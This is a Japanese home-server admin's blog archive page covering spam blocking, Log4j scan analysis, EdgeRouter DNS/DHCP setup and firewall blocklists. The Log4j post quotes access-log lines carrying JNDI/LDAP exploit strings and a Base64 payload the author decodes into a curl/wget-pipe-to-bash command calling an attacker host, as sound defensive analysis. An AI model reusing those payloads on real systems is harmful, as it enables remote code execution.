ホーム » コンピュータ » Network (ページ 4)

Network」カテゴリーアーカイブ

システム

最近の投稿

アーカイブ

カテゴリー

ctgserver.net からのspam攻撃

2022-01-05

自宅サーバに spam 送信の攻撃がしつこい。

確認すると、日本国内に割り当てられたIPアドレスだけど、ctgserver.net という中国系企業に割り当てられたもの。デタラメなホストを名乗って送信しようとしている。日本国内のアドレスとはいえ悪質なので、Firewall で 202.61.144.0/20 でごっそり接続拒否としておいた。

Jan  5 21:34:41 perrine postfix/smtpd[1163220]:
   connect from unknown[202.61.149.209]
Jan  5 21:34:41 perrine postfix/smtpd[1163220]: NOQUEUE: reject:
   RCPT from unknown[202.61.149.209]: 450 4.7.25
   Client host rejected: cannot find your hostname, [202.61.149.209];
   from=<jcbjp-account-update@cnzsyc.cn> to=<xxxx@tsaitoh.net> proto=ESMTP helo=
Jan  5 21:34:41 perrine postfix/smtpd[1163220]:
   disconnect from unknown[202.61.149.209] ehlo=2 starttls=1 mail=1 rcpt=0/1 quit=1 commands=5/6

同様の攻撃が、134.122.192.0/18 “BGP CONSULTANCY PTE LTD” からも届いている。これまた、日本国内割り当ての中国系企業。この記事を見ると同じ穴のムジナっぽい。がんがん拒否しまくろう。国内IPアドレスも汚染されてきてるよなぁ…

制限しても、すぐさま別のアドレスから同じような攻撃。調べてみると大きなアドレスブロックを持ってるな。

202.61.128.0/18
134.122.192.0/18
118.107.0.0/18

Java Log4j 攻撃が自宅サーバにも来ている?

2021-12-13

JPCERT/CC などでも重大な脆弱性として報告されている Log4j への攻撃だけど、Java なぞ動いていない我が家の”自己満足サーバ”にさえも届いている。

UserAgent で履歴確認

こちらの記事を参考に、UserAgent に変な値が入っていないか Log を漁ってみた。

この結果、攻撃のため? のLOGには、以下のような記録がある。UserAgent の中に埋め込まれている、”cryptoslogic-cve-2021-44228.com” というのは、ドメイン名部分が Log4j の脆弱性の正式名称なので、攻撃目的ではなく、攻撃可能性を警鐘するためグループからのアクセスかもしれない。

[/var/log/apache2]# grep -i user access.log.1 | grep -i agent
68.183.207.73 - - [12/Dec/2021:02:23:59 +0900] "GET / HTTP/1.1" 302 16843 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
68.183.207.73 - - [12/Dec/2021:02:23:59 +0900] "GET /wp/ HTTP/1.1" 301 266 "https://xx.xx.xx.xx/" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
68.183.207.73 - - [12/Dec/2021:02:24:01 +0900] "GET /wp/ HTTP/1.1" 200 17388 "https://xx.xx.xx.xx/wp/" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
68.183.207.73 - - [12/Dec/2021:08:24:43 +0900] "GET / HTTP/1.1" 302 12543 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
68.183.207.73 - - [12/Dec/2021:08:24:43 +0900] "GET /wp/ HTTP/1.1" 301 237 "http://xx.xx.xx.xx/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
68.183.207.73 - - [12/Dec/2021:08:24:50 +0900] "GET /wp/ HTTP/1.1" 200 17389 "http://xx.xx.xx.xx/wp/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"

自分が仕事を含め外部公開をしているサーバで、上記のような履歴を確認したら、すべてのサーバに、12/12の日付の LOG が残っていた。

試しにアクセスしてきた IP アドレスを逆引き。digitalocean.com が管理しているアドレスということが判る。んで、”whois kryptoslogic-cve-2021-44228.com” で調べてみるけど、あまりいい情報は出てこない。

[~]# dig -x 68.183.207.73
:
;; AUTHORITY SECTION:
207.183.68.in-addr.arpa. 957    IN      SOA
  ns1.digitalocean.com. hostmaster.207.183.68.in-addr.arpa. (略)
[~]# whois kryptoslogic-cve-2021-44228.com
(略)

これを見ると、ドメイン名にLog4jの脆弱性の名前を使っているし、kryptos logic という脆弱性診断のサービスをしている企業なども見えてくるので、単純に攻撃ではないかもしれない。悪意があるのであれば、攻撃用のホストの部分に、ちゃんとしたドメイン登録されているホスト名を使わないはず。

jndi:ldap の履歴確認

ということで、今回の攻撃? では、どれも jndi:ldap というのがカギっぽいので、あらためて “grep -i jndi:ldap access.log” をしてみた。すると、他の攻撃パターンも見えてきた。

[~]# cd /var/log/apache2 
[/var/log/apache2]# ( cat access.log{,.1} && zcat access.log*.gz ) | grep -i jndi:ldap
37.120.189.247 - - [13/Dec/2021:16:02:47 +0900] "GET /$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D HTTP/1.1" 404 4616 "-" "Mozilla/5.0 zgrab/0.x"
68.183.207.73 - - [12/Dec/2021:02:23:59 +0900] "GET / HTTP/1.1" 302 16843 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
68.183.207.73 - - [12/Dec/2021:02:23:59 +0900] "GET /wp/ HTTP/1.1" 301 266 "https://xx.xx.xx.xx/" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
68.183.207.73 - - [12/Dec/2021:02:24:01 +0900] "GET /wp/ HTTP/1.1" 200 17388 "https://xx.xx.xx.xx/wp/" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
68.183.207.73 - - [12/Dec/2021:04:01:44 +0900] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 4615 "-" "Kryptos Logic Telltale"
68.183.207.73 - - [12/Dec/2021:08:24:43 +0900] "GET / HTTP/1.1" 302 12543 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
68.183.207.73 - - [12/Dec/2021:08:24:43 +0900] "GET /wp/ HTTP/1.1" 301 237 "http://xx.xx.xx.xx/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
68.183.207.73 - - [12/Dec/2021:08:24:50 +0900] "GET /wp/ HTTP/1.1" 200 17389 "http://xx.xx.xx.xx/wp/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
68.183.207.73 - - [12/Dec/2021:09:40:02 +0900] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 404 402 "-" "Kryptos Logic Telltale"
20.71.156.146 - - [11/Dec/2021:18:10:51 +0900] "GET / HTTP/1.1" 302 12543 "-" "/${jndi:ldap://45.130.229.168:1389/Exploit}"

すると、攻撃用のホストに、分かり易いドメイン名など使っていない、IPアドレスそのまんまの”悪意を想定した方がよさそうな”アクセス履歴が出てくる。かといって、ldap URL の後ろに “Exploit” といった、文字が含まれているから、まだ違うのかな…

わちゃ、こりゃ悪意の塊…

同じような履歴を仕事で管理しているサーバで実行していたら、以下のようなアクセス履歴が見つかる。

45.155.205.233 - - [10/Dec/2021:22:35:08 +0900] "GET / HTTP/1.1" 200 11705 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMDQuMjE1LjI0LjI0MTo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xMDQuMjE1LjI0LjI0MTo4MCl8YmFzaA==}"

後半の部分が、Base64 とかの後ろに、”KGN…aA==” とかいう、いかにも BASE64 エンコーディングされたような文字列発見。
base64 デコードサービスで確認すると

(curl -s 45.155.205.233:5874/xx.xx.xx.xx:80
 ||wget -q -O- 45.155.205.233:5874/xx.xx.xx.xx:80)  # xx.xx.xx.xx は攻撃対象のIP
|bash

なんて文字が出てくる。こりゃ、確実に悪意のあるスクリプト。

たぶん、踏み台となっているコマンドサーバ(45.155.205.233)からダウンロードした shell script をbash で実行しようとしている。そこで、このアドレスを、dig -x やら whois やらで調べてみるけど、踏み台だし「攻撃者だけど実際は犠牲者」の情報だし、これ以上調べてもまともな情報は出てこないだろう。別に調べたら、ロシアのコンピュータ。自宅サーバはロシアなどの国は最初からアクセス禁止してあるから、履歴が無かっただけか。んで、このコマンドサーバに、試しに ping やら nmap を実行してみる。

[~]# dig -x 45.155.205.233
(略)
;; AUTHORITY SECTION:
205.155.45.in-addr.arpa. 1258   IN      SOA
   pns21.cloudns.net. support.cloudns.net. (略)
[~]# whois cloudns.net
(無料のDNSサービスなのであまりいい情報が無い)

[~]# ping 45.155.205.233
[ping 反応なし]
[~]# nmap 45.155.205.233
[nmap 反応なし]

たぶん、すでに踏み台となっていることの報告がでて、プロバイダが対応をしたんだろうけど、反応がない。

まとめ記事へのリンク

Log4j に関連するパッケージ

Log4j は色々な使われ方をしているようなので、一応確認。

(( log4j という名前を含むパッケージの検索 ))
[~]# dpkg -l | grep log4j
ii  liblog-log4perl-perl  1.54-1  all  Perl port of the widely popular log4j logging package
(( liblog-log4per-perl に依存しているパッケージを探す ))
[~]# aptitude purge liblog-log4perl-perl
:
以下のパッケージには満たされていない依存関係があります:
 munin : 依存: liblog-log4perl-perl インストールされません

edgerouter-x の DNS fowarding 設定

2021-12-06

Edgerouterで キャッシュDNS を動かす

自宅サーバが落ちた時のDNSトラブル対策で、自宅内で運用しているEdgerouter-xをDNSの予備として稼働させるための設定。
options の欄は dnsmasq.conf の設定を読めと書いてあったので、ググりながら設定してみた。

ubnt@ubnt# show service dns forwarding
 cache-size 1200
 listen-on switch0
 name-server 8.8.8.8
 name-server 8.8.4.4
 name-server 192.168.xx.xx                             ## ルータのDNSを参照
 options server=/tsaitoh.takefu.fukui.jp/192.168.xx.yy ## 自宅内の正引き
 options server=/tsaitoh.net/192.168.xx.yy             ## 自宅ドメイン正引き
 options server=/168.192.in-addr.arpa/192.168.xx.yy    ## 自宅内の逆引き

自宅内のDHCPでは、自宅内DNSと、edgerouter-x を参照するように既に設定されている。
試しにメインサーバで “systemctl stop named” で DNS を停止した状態で、パソコンでブラウザを操作したけど問題なくWeb を使える。自宅内のホスト名もキャッシュの範囲でちゃんと動くかな。

DHCP failover を Edgeroute で運用

DNSの設定を見直していたら、Edgerouter-x には、DHCP の failover 機能(2台目のDHCP機能) の設定がある。たまにメインサーバが落ちた時に、自宅ネットワーク環境が一切動かなくなるので、Edgerouter で DHCP failover を運用してみる。

ubnt@ubnt# show service dhcp-server
 disabled false
 :
 shared-network-name localnet {
     :
     subnet 192.168.xx.0/24 {
         default-router 192.168.xx.xx
         dns-server 192.168.xx.xx
         dns-server 192.168.xx.yy
         domain-name tsaitoh.takefu.fukui.jp
         failover {
             local-address 192.168.xx.yy
             name edgerouterx
             peer-address 192.168.xx.xx
             status secondary
         }

CTFページへのアクセスが増えてら

2021-11-06

メールの送受信量のモニタに、我が家としては多いメール受信。不正メール中継されたかと心配になったけど、自宅サーバで公開している CTF のページの参照だった。(正解/不正解の確認をメールで行ってるため)

来週末に、高専 K-SEC の情報セキュリティ人材育成の CTF 初心者向けの講習会+大会があるからだろうな。

iOS15でナビとのテザリングが改善

2021-10-02

iOS15で改善された機能だけど、ナビとiPhoneをインターネット共有でのWiFi接続がちゃんと動くようになった。
{CAPTION}
相性のいいナビなら普通の機能なんだけど、私のトヨタAquaでは、今までは「設定-インターネット共有」の画面を開かないとテザリングが始まらなかった。(相性が悪くって、WiFiの接続情報が重複登録されて「インターネット共有」の画面を開いても繋がらない状態になったりもする。)
だから、車の起動時にBluetooth接続したら、「インターネット共有」の画面を起動するショートカットを作ったりもしたけど、ショートカットが起動する度に通知確認が必要だったりで、テザリングのための何らかの操作が必要だった。
でも、今回のアップデートのお陰で勝手に繋がるようになっている。

mineo 10GB/day

2021-09-26

寮の宿直で、LANアダプタを持ってきてなくって、mineoで接続。月末だし10GBほどパケ残ってたし、特段気にせず使ってみた。
んで、今朝確認したら、一晩でほぼ使い切り。
mineoは、子ども2人それぞれ5GB/月と、めったに使わない私が500MB/月で契約している。しかし子どもも自宅と学校もWiFi使えるし、毎月パケット繰越しで、今月もパケットシェアで30GB使える状態だった。
でも、気にせず使ったら一晩で1/3を使い切り。子どもも通学時にしか使わないとはいえ、5GB/月契約でよく足りているなぁ…。
{CAPTION}

国別拒否リストでVN,PH追加

2021-09-21

自宅サーバへの攻撃のチェック中。IPアドレスの所属する国を確認した拒否リストを作ってフィルタリングしているけど、改めて攻撃者のIPアドレスを、whois を使って国を確認する。

今回は、現時点で許可している状態で、ssh への攻撃をドメイン毎に分類して作成したCクラスの拒否リストの国を確認したら、ベトナム 60 件、フィリピン 12件。ということで、日本としては仲良くしたい国かもしれんけど、ゴメン拒否の国に追加やわ。

 

ダイソーの100均LANケーブル

2021-06-21

以前、パソコンまわりのネットワークの配線で、100均で買ったLANケーブル(1m)を使っている。100円だし、TV, CATVチューナ, ゲーム機といった、10 or 100BASE の速度だし、十分。

んで、追加で買おうと100均巡りをしたけど、全然みつからない。仕方がないので、ダイソーオンラインで発注。ただし1個(100円)単位で通販できるわけもなく、10個単位。アマゾンで同じようなケーブル探しても5本組で買っても、ダイソー10個送料付きと同じような値段かな。

ケーブルを入れ替えた後のHUBは、すっきり。

 

{CAPTION}

FireWall用のブラックリスト自動生成

2021-06-19

自宅サーバでは、FireWall を動かしているけど、アクセス履歴を見ると色々と怪しい接続が気になる。ある程度は LOG を確認して、FireWall の拒否リストを整理していたけど、自動化してみた。

FireWall では、主要なのは iptables で管理し、巨大な拒否リストになりそうなものは、ipset で拒否リストを作り、iptables から、その ipset を参照するようにしている。

GEOIPDENY により国ごと拒否

  • 国ごと拒否リスト make-geoip-deny.pl
    RIR の IPアドレス範囲と国ドメインのデータベースをダウンロードして、拒否リストを生成。かなり巨大なリストが作られる。
((更新状況を確認))
[root]# ./make-geoip-deny.pl -d | head
/usr/bin/wget -q -O - 'ftp://ftp.arin.net/pub/stats/arin/delegated-arin-extended-latest'
/usr/bin/wget -q -O - 'ftp://ftp.ripe.net/pub/stats/ripencc/delegated-ripencc-extended-latest'
/usr/bin/wget -q -O - 'ftp://ftp.apnic.net/pub/stats/apnic/delegated-apnic-extended-latest'
/usr/bin/wget -q -O - 'ftp://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-extended-latest'
/usr/bin/wget -q -O - 'ftp://ftp.afrinic.net/pub/stats/afrinic/delegated-afrinic-extended-latest'
ipset count before : 65658
ipset count merge : 26038
ipset count after : 39526

((FireWallの更新))
[root]# systemctl stop ferm && systemctl start ferm

25か国の接続を拒否しているけど、単純に RIR の情報だと 65658件のアドレスブロック。25か国のアドレスブロックで隣接しているアドレスブロックをマージして、26038件に減らせた。しかし、サブネットマスクに指定できるアドレスブロックに変換して、最終的に 39526 行の拒否リストが出来上がっている。

RIRのデータのダウンロードに時間がかかり30秒ほどかかるし、国に割り振られる IPv4 アドレスなんて変化も少ないので、気が向いた時に更新かな。

SMTPDENY と SSHDENY

  • SMTPの拒否リスト make-smtp-deny.pl
    SASL login を試す攻撃が多いので、/var/log/mail.log の履歴から、拒否リストを生成。
  • SSHの拒否リスト make-ssh-deny.pl
    ssh は、/etc/hosts.allow で、自分が使うネットワーク以外は接続を拒否して ssh 自身は既に守っているけど、接続を試すような相手はヤバイので ssh 以外すべての接続を拒否させる。/var/log/messages の履歴から生成。

怪しい接続をしてくる IP アドレスを抽出し、クラス C でグループ化して、数十回の接続履歴のあるものを抜粋して、拒否リストを生成している。それぞれ 30 行ほどの拒否リストとなった。

この拒否リストは、生成も1秒程度で生成できるので、cron.weekly にて更新。

 

WiFiルータ HWD14 が2022-03-31まで

2021-06-02

お出かけの際のWiFi環境ということで、HWD14 (我が家で通称チビ太)で使っていた WiFi ルータだけど、当初の au から、mineo に変更し使っていたけど、nano-SIM, micro-SIM によるサービスが 2022/03/31 でサービス終了で使えなくなるとのメールが届く。au VoLTE 対応の SIM を使う機種への変更などが必要。

あーの携帯は、au VoLTE SIM なので、問題ナシ。みーの携帯は、docomo で関係ナシ。

月額900円ほどで契約しているけど、最近はほとんど使う機会が減り、長距離ドライブする時の車中WiFi程度だった。個人的にはスマホのテザリングばかりだし、解約かな。

投稿ナビゲーション

過去の投稿 新しい投稿

Google 検索

My Google   Yahoo

Microsoft

ファンサイト